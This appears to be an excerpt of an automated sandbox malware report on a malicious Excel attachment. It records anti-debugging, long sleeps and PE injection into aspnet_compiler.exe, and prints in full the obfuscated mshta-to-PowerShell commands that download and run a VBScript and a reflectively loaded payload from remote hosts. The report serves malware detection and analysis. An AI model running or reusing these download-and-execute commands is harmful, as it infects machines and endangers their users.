              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: PI-02911202409#.xla.xlsxStream path 'MBD006EC260/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: PI-02911202409#.xla.xlsxStream path 'Workbook' entropy: 7.9983984088 (max. 8.0)
              Source: 50A30000.0.drStream path 'MBD006EC260/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: 50A30000.0.drStream path 'Workbook' entropy: 7.99853880878 (max. 8.0)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AE0101 rdtsc 16_2_00AE0101
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3148Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6800Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 897Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7002Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exe TID: 3620Thread sleep time: -360000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep count: 3148 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep count: 6800 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep time: -3600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 1976Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AE0101 rdtsc 16_2_00AE0101
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A907AC NtCreateMutant,LdrInitializeThunk,16_2_00A907AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A80080 mov ecx, dword ptr fs:[00000030h]16_2_00A80080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A800EA mov eax, dword ptr fs:[00000030h]16_2_00A800EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA26F8 mov eax, dword ptr fs:[00000030h]16_2_00AA26F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgfuzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfose
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"Jump to behavior
